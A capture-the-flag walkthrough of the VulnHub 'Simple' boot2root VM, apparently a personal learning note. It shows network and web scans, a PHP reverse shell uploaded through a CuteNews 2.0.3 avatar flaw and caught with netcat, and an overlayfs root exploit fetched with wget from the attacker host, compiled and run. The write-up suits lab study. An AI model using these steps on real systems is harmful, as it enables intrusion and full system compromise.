[VulnHub] SecTalks: BNE0x03 - Simple

“Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.” – Robert Winkel

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: SecTalks: BNE0x03 - Simple (10.1.1.134/24)

Vulnerability & Exploit

CuteNews 2.0.3 remote file upload vulnerability
Exploit overlayfs local root vulnerability to get ROOT

Method

Scanned the network to discover the target server [arp-scan]
Port scanned the target to discover running services and open ports [masscan && nmap]
Web application scanned to dig more information about web service [nikto]
Exploit remote file upload vunlerability to upload webshell [php-reverse-shell]
Enumeration and exploit the local priviledge vulnerability to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address.

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.134    00:0c:29:29:7a:4e   VMware, Inc.
10.1.1.254    00:50:56:f0:91:47   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.839 seconds (90.17 hosts/sec). 4 responded

10.1.1.134 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

root@kali:~# masscan -p1-65535 10.1.1.134/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-06-07 07:39:25 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.1.1.134

root@kali:~/simpleCTF# nmap -v -sV -A -O 10.1.1.134 -oN 134_nmap.txt

...truncated...
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 759585A56089DB516D1FBBBE5A8EEA57
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews
MAC Address: 00:0C:29:29:7A:4E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
...truncated...

Only port 80 is found and Apache 2.4.7 is the HTTP server, also find that, from the title, the CMS is CuteNews.

In the meanwhile, I run nikto to scan web vulnerabilities in terms of port 80 found by port-scanning stage.

- Nikto v2.1.6/2.1.5
+ Target Host: 10.1.1.134
+ Target Port: 80
+ GET Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.6
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Cookie CUTENEWS_SESSION created without the httponly flag
+ GET Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x47e 0x4ec3e1d077c80
+ IZUYPEIH Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: GET /docs/: Directory indexing found.
+ OSVDB-3092: GET /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: GET /icons/README: Apache default file found.

Nothing special, so next I open firefox to check the WEB application.

I found a login page, also the WEB application is CuteNews 2.0.3.

By checking online, CuteNews 2.0.3 has an known Remote File Upload Vulnerability.

So I sign up a new user f4l13n and log in to Personal Option, then upload PHP reverse shell rsh443.php as Avatar picture, here I use burp proxy to check the request.

After the webshell uploaded successfully, I setup nc to listen on port 443 and wait for the reverse shell connect back.

Then go to http://10.1.1.134/uploads/, here I can find the uploaded PHP shell, by accessing this PHP file to trigger the shell.

root@kali:~# nc -lvnp 443
listening on [any] 443 ...
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.134] 48114
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 05:35:36 up  1:57,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
bull:x:1000:1000:bull,,,:/home/bull:/bin/bash

Then after lots of enumeration, I found the overlayfs local root vulnerability can let me root in.

www-data@simple:/tmp$ wget http://10.1.1.130/privesc/37292.c -O /tmp/37292.c
wget http://10.1.1.130/privesc/37292.c -O /tmp/37292.c
--2016-06-07 06:06:10--  http://10.1.1.130/privesc/37292.c
Connecting to 10.1.1.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/x-csrc]
Saving to: '/tmp/37292.c'

100%[======================================>] 5,123       --.-K/s   in 0s

2016-06-07 06:06:10 (18.0 MB/s) - '/tmp/37292.c' saved [5123/5123]

www-data@simple:/tmp$ gcc 37292.c -o 37292
gcc 37292.c -o 37292
www-data@simple:/tmp$ ls -al
ls -al
total 200
drwxrwxrwt  2 root     root       4096 Jun  7 06:06 .
drwxr-xr-x 21 root     root       4096 Sep  9  2015 ..
-rwxrwxrwx  1 www-data www-data  12502 Jun  7 06:00 37088
-rw-rw-rw-  1 www-data www-data   6276 Sep  2  2015 37088.c
-rwxrwxrwx  1 www-data www-data  12189 Jun  7 06:06 37292
-rw-rw-rw-  1 www-data www-data   5123 Jun  7 06:04 37292.c
-rwxrwxrwx  1 www-data www-data  25304 Aug 19  2015 lpc.py
-rw-rw-rw-  1 www-data www-data 119499 Jun  7 05:48 lpc_rst.txt
www-data@simple:/tmp$ ./37292
./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# pwd
pwd
/tmp
# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt    
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
# 

Done~

F4l13n5n0w

Info Security & Pen Testing learning notes